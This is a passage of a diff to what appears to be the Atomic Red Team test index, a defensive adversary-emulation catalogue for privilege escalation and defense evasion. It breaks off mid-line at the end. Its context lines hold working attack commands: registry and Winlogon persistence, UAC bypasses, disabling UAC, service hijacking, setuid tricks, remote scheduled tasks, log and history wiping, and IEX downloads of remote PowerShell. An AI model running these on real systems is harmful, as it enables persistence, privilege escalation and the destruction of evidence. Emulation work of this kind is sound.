- linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1547.001: @@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1547.009: @@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true @@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1055.014: technique: @@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) - ' +' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'cp /bin/ls #{file_to_pad} - ' +' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' cleanup_command: 'rm #{file_to_pad} - ' +' name: sh T1542.003: technique: @@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) - ' +' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} - ' +' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) - ' +' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' name: command_prompt T1574.012: technique: @@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history - ' +' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm - ' +' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history - ' +' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history - ' +' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history - ' +' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history - ' +' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions - ' +' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file - ' +' supported_platforms: - linux - macos @@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog - ' +' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting - ' +' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname - ' +' cleanup_command: 'userdel -f testuser1 - ' +' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history - ' +' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing - ' +' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history - ' +' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath - ' +' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} - ' +' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} - ' +' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. - ' +' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} - ' +' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1553.002: technique: external_references: @@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} - ' +' executor: command: 'Invoke-Expression #{input_file} - ' +' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | gcc #{input_file} && ./a.out @@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: 'go run #{input_file} - ' +' name: bash T1218.001: technique: @@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) - ' +' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path 